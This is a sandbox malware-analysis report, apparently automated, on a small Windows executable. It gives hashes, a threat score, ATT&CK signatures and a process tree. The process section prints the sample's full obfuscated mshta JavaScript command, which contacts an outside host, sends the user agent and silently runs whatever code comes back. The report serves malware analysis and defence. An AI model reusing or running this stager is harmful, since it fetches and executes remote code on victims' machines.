Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    31-07-2024 10:59

General

  • Target

    0297bbb0f00b3f591894ebcf042f2c6b0ed52e6662def1a9dbca0f8d20133cee.exe

  • Size

    2KB

  • MD5

    4a6ac8d48c9793c0c852a6ac93ba2002

  • SHA1

    cdc7a9cf8ee36099c823779ac2dd8ffe3a84d723

  • SHA256

    0297bbb0f00b3f591894ebcf042f2c6b0ed52e6662def1a9dbca0f8d20133cee

  • SHA512

    3aacced9817519ae31ed2bc4cf4063b2eb0a1c9e9addbcb9e08b3431f519ca0a8a6a8962e1039835a48e50cb52cd08d21cad642a66822c288d2b0a88541c361e

Score
3/10

Malware Config

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0297bbb0f00b3f591894ebcf042f2c6b0ed52e6662def1a9dbca0f8d20133cee.exe
    "C:\Users\Admin\AppData\Local\Temp\0297bbb0f00b3f591894ebcf042f2c6b0ed52e6662def1a9dbca0f8d20133cee.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();27;y=unescape('%336%7Eh%74t%70%3A%2F%2F%61s%751%30%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E1%333').split('~');204;try{x='WinHttp';251;x=new ActiveXObject(x+'.'+x+'Request.5.1');200;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);117;x.send();134;y='ipt.S';8;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);71;}catch(e){};165;;window.close();"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads